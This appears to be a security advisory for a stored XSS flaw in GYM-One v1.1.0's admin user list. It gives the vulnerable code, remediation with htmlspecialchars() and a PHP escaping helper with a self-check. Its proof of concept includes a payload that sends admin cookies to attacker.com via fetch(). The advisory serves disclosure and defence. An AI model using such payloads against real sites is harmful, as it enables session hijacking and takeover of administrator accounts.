12/06/2026 — Security Advisory

CVE-2026-55872 — Stored XSS in GYM-One v1.1.0

Product: GYM-One
Version: v1.1.0
File: admin/users/index.php
CVE: CVE-2026-55872
CWE: CWE-79 — Improper Neutralization of Input During Web Page Generation
CVSS 3.1 Vector: AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
CVSS Score: 8.7 (High)
Auth Required: Yes (user registration)
Discovered by: Lennart Hostettler

Description

GYM-One v1.1.0 is vulnerable to Stored Cross-Site Scripting in admin/users/index.php. The fields firstname, lastname, and email from the users table are rendered directly into HTML without htmlspecialchars() or any output encoding:

echo "<td>" . $row["firstname"] . "</td>"; // line 409
echo "<td>" . $row["lastname"] . "</td>";  // line 410
echo "<td>" . $row["email"];               // line 411

A registered user can inject arbitrary HTML/JavaScript into their profile fields. The payload executes in the browser of any admin who visits /admin/users/.

Proof of Concept

> Step 1 — Inject payload via registration

Register a new user with the following firstname:

<img src=x onerror=alert(1)>

For session hijacking:

<img src=x onerror="fetch('https://attacker.com/?c='+document.cookie)">

> Step 2 — Trigger

Admin navigates to:

GET /admin/users/

Result: The injected script executes in the admin's browser context.

Impact

Vendor Response

The maintainer responded the same day the report was submitted, patched the vulnerability promptly, and communicated throughout the process in a professional and solution-oriented manner. This is how coordinated disclosure should work.

Remediation

Wrap all database output in htmlspecialchars() before rendering:

echo "<td>" . htmlspecialchars($row["firstname"], ENT_QUOTES, 'UTF-8') . "</td>";
echo "<td>" . htmlspecialchars($row["lastname"],  ENT_QUOTES, 'UTF-8') . "</td>";
echo "<td>" . htmlspecialchars($row["email"],     ENT_QUOTES, 'UTF-8') . "</td>";
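To make the fix harder to get wrong in other views, it helps to route every value through one escaping helper rather than repeating the htmlspecialchars() call at each echo. The following is an added example, not code from GYM-One: it assumes PHP 8 or later, and the helper names e() and renderUserRow() are hypothetical. It adds ENT_SUBSTITUTE to the flags from the remediation above so that a malformed UTF-8 value is replaced rather than silently rendered as an empty string, and the CLI self-check feeds the advisory's own payload through the renderer to confirm it comes out as inert text.

```php
<?php
// Added example (not GYM-One's code): one escaping helper, one row
// renderer for the admin user table, and a CLI self-check. Assumes PHP 8+.

declare(strict_types=1);

/**
 * Escape a value for an HTML text or attribute context.
 * ENT_QUOTES encodes both quote styles (matches the advisory's fix);
 * ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning '', which
 * would otherwise blank the cell without any error.
 */
function e(?string $value): string
{
    return htmlspecialchars((string) $value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/**
 * Render one user row. Every database value passes through e() before it
 * is concatenated into markup; column names match the advisory.
 */
function renderUserRow(array $row): string
{
    return '<tr>'
        . '<td>' . e($row['firstname'] ?? '') . '</td>'
        . '<td>' . e($row['lastname']  ?? '') . '</td>'
        . '<td>' . e($row['email']     ?? '') . '</td>'
        . '</tr>';
}

/**
 * Self-check: the firstname carries the advisory's PoC payload and the
 * surname carries a single quote. Returns true only if no raw tag from
 * the values reaches the output and the quote is entity-encoded.
 */
function selfCheck(): bool
{
    // Constructed sample row, not data from a real installation.
    $row = [
        'firstname' => '<img src=x onerror=alert(1)>',
        'lastname'  => "O'Brien",
        'email'     => 'user@example.com',
    ];
    $html = renderUserRow($row);

    return str_contains($html, '&lt;img src=x onerror=alert(1)&gt;')
        && !str_contains($html, '<img')
        && str_contains($html, 'O&#039;Brien');
}

if (PHP_SAPI === 'cli') {
    echo selfCheck() ? "escaping check passed\n" : "escaping check FAILED\n";
    exit(selfCheck() ? 0 : 1);
}
```

Run with `php render_user_row.php`; the exit status is 0 when the payload is rendered as text. The helper is only correct for HTML text and quoted attribute contexts; values placed into JavaScript, URLs or CSS need context-specific encoding instead.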